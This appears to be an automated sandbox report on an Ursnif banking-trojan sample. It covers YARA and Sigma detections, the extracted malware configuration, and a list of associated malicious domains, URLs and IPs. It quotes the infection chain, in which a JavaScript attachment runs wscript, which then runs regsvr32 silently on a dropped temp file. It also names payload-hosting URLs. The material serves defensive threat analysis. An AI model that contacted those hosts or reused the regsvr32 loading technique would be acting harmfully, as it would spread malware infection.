Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4512, type: MEMORY

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1128248157.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127990612.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1157819939.00000000055FB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128423151.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127823984.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128531702.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128488327.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128128667.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128341162.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4512, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "337", "system": "e8a5b28f2e21add3528954a373c9ff9ahh!", "size": "200776", "crc": "2", "action": "00000000", "id": "2000", "time": "1588830398", "user": "31b341dd54c8a3b79c4b2eb545ab75a4", "hash": "0x7d10c6e1", "soft": "3"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
fs.ramtool.at2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://fs.ramtool.at/favicon.ico0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.1128248157.0000000005778000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.1127990612.0000000005778000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.1157819939.00000000055FB000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.1128423151.0000000005778000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.1127823984.0000000005778000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000004.00000003.1128531702.0000000005778000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              00000004.00000003.1128488327.0000000005778000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                00000004.00000003.1128128667.0000000005778000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                  00000004.00000003.1128341162.0000000005778000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                    Process Memory Space: regsvr32.exe PID: 4512JoeSecurity_UrsnifYara detected UrsnifJoe Security

                      Unpacked PEs

                      No yara matches

                      Sigma Overview


                      System Summary:

                      barindex
                      Sigma detected: BlueMashroom DLL LoadShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_i1j.js', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2972, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, ProcessId: 2396
                      Sigma detected: Regsvr32 AnomalyShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_i1j.js', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2972, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, ProcessId: 2396

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      47.241.106.208open_attach_n2k.jsGet hashmaliciousBrowse
                      • api10.dianer.at/jvassets/xI/t64.dat
                      job_attach_t9o.jsGet hashmaliciousBrowse
                      • f1.pipen.at/favicon.ico

                      Domains

                      No context

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      unknownINV_331823.xlsGet hashmaliciousBrowse
                      • 38.88.126.131
                      INV_331823.xlsGet hashmaliciousBrowse
                      • 80.249.147.185
                      http://natashacape.buzz/maconbaconbaseball/maconbaconbasebal/Encoded/214ba32470aa5b3781da243145b9a6aa/resubmit.phpGet hashmaliciousBrowse
                      • 104.16.123.96
                      http://cfe-recibos.com.mxGet hashmaliciousBrowse
                      • 34.98.67.61
                      fattura.exeGet hashmaliciousBrowse
                      • 176.123.7.112
                      397 83342{DIGIT[5]).xlsGet hashmaliciousBrowse
                      • 38.88.126.131
                      397 83342{DIGIT[5]).xlsGet hashmaliciousBrowse
                      • 80.249.147.185
                      Case.exeGet hashmaliciousBrowse
                      • 5.9.145.244
                      http://internetslang.comGet hashmaliciousBrowse
                      • 64.74.236.127
                      #U260e#Ufe0fVM4 May, 2020_6446-172.htmGet hashmaliciousBrowse
                      • 5.160.139.86
                      https://docs.google.com/uc?export=download&id=18WkaU3uqJjGddX0C7rySxkEUcexcKAGdGet hashmaliciousBrowse
                      • 216.58.215.225
                      1vInNmZSuC.exeGet hashmaliciousBrowse
                      • 99.80.110.198
                      #Ud83d#Udd0a#Ud83d#Udcde +44 7912-392561 audio.htmGet hashmaliciousBrowse
                      • 172.94.114.82
                      Doc-7988.xlsGet hashmaliciousBrowse
                      • 52.114.77.33
                      http://govermentbids.com/Get hashmaliciousBrowse
                      • 162.247.242.18
                      https://disadent.com/#safety@vueling.comGet hashmaliciousBrowse
                      • 95.216.33.133
                      Your JLR_v2.1.1_apkpure.com.apkGet hashmaliciousBrowse
                      • 35.190.88.7
                      com Audio_46834.htmGet hashmaliciousBrowse
                      • 13.224.197.30
                      https://enlacegc.com/workmonde/ab/Get hashmaliciousBrowse
                      • 192.185.87.173
                      https://centralvalleyfiredistrict-my.sharepoint.com/:o:/g/personal/cdahlhauser_centralvalleyfire_com/ErfN3NtAi9JIpOFG7kMZJAoBTifDzDUf4sQxD8R-E8l-yw?e=j0vdYsGet hashmaliciousBrowse
                      • 52.114.132.20

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.